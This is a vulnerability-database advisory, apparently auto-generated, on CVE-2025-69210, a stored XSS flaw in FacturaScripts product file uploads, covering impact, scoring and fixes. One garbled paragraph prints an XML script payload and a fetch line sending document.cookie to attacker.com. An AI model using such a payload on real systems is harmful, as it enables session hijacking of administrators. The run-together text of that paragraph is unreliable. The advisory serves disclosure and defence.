
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-69210 is a stored cross-site scripting (XSS) vulnerability in FacturaScripts, an open-source ERP and accounting software, affecting all versions prior to 2025.7. The flaw resides in the product file upload functionality, where authenticated users can upload crafted XML files containing executable JavaScript that is later rendered without sufficient sanitization or content-type enforcement. It was published and patched on December 30, 2025. The CVSS v3.1 base score is 5.4 (Medium), while the GitHub Advisory Database assigns a CVSS v4 overall score of 8.6 (High) (GitHub Advisory, NeoRazorX Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) and stems from insufficient input validation and a lack of content-type enforcement when serving uploaded product files (GitHub Advisory). An authenticated attacker with low privileges can upload a crafted XML file embedding malicious JavaScript payloads into the product file upload feature; when the file is subsequently accessed or rendered by the application, the JavaScript executes in the viewer's browser context. Because product files uploaded by regular users are accessible to administrative users, the attack chain specifically enables privilege escalation via session hijacking — a low-privileged user can target administrator sessions without any additional preconditions beyond having a valid account (NeoRazorX Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser session of any user — including administrators — who accesses the malicious uploaded file. This can result in session token theft, account takeover of privileged users, unauthorized actions performed on behalf of the administrator (such as creating accounts or modifying financial records), and potential further compromise of the ERP system. Confidentiality and integrity of data managed within FacturaScripts are both at risk, though availability is not directly impacted (GitHub Advisory, NeoRazorX Advisory).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.061%, indicating a low near-term probability of exploitation. Exploitation requires an authenticated attacker (low privilege) and passive user interaction from an administrator, limiting opportunistic mass exploitation but making it relevant in targeted insider-threat or supply-chain scenarios.
<?xml version="1.0"?><root><script xmlns="http://www.w3.org/1999/xhtml">alert(document.cookie)</script></root> or a more sophisticated payload designed to exfiltrate session cookies to an attacker-controlled server.fetch('https://attacker.com/?c='+document.cookie)).<script> tags, JavaScript event handlers, or encoded JavaScript payloads.The vendor has released FacturaScripts version 2025.7, which fixes this vulnerability; upgrading is the primary recommended remediation (NeoRazorX Advisory, v2025.7 Release). As interim mitigations, administrators should implement strict server-side validation and sanitization of all uploaded file content, enforce correct Content-Type response headers (e.g., application/octet-stream or text/plain) when serving uploaded files to prevent browser rendering, and restrict file upload permissions to trusted users only. Additionally, deploying a Content Security Policy (CSP) header can reduce the impact of any XSS execution.
The vulnerability was credited to researcher vettrivel007 in the GitHub Security Advisory (NeoRazorX Advisory). The disclosure received routine coverage from vulnerability aggregators including Vulners, VulDB, CIRCL Vulnerability Lookup, and INCIBE-CERT, with no notable broader media coverage or significant community debate observed (INCIBE-CERT).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."